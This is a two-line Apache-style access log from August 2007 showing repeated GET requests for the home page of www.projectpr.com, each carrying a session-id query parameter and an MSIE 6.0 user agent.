66.196.97.158 - - [18/Aug/2007:22:02:51 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg/wmtws0p2afr0ym9ewj4 HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
66.196.97.158 - - [18/Aug/2007:22:02:54 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg/wmtws0p2afr0ym9ewj4 HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
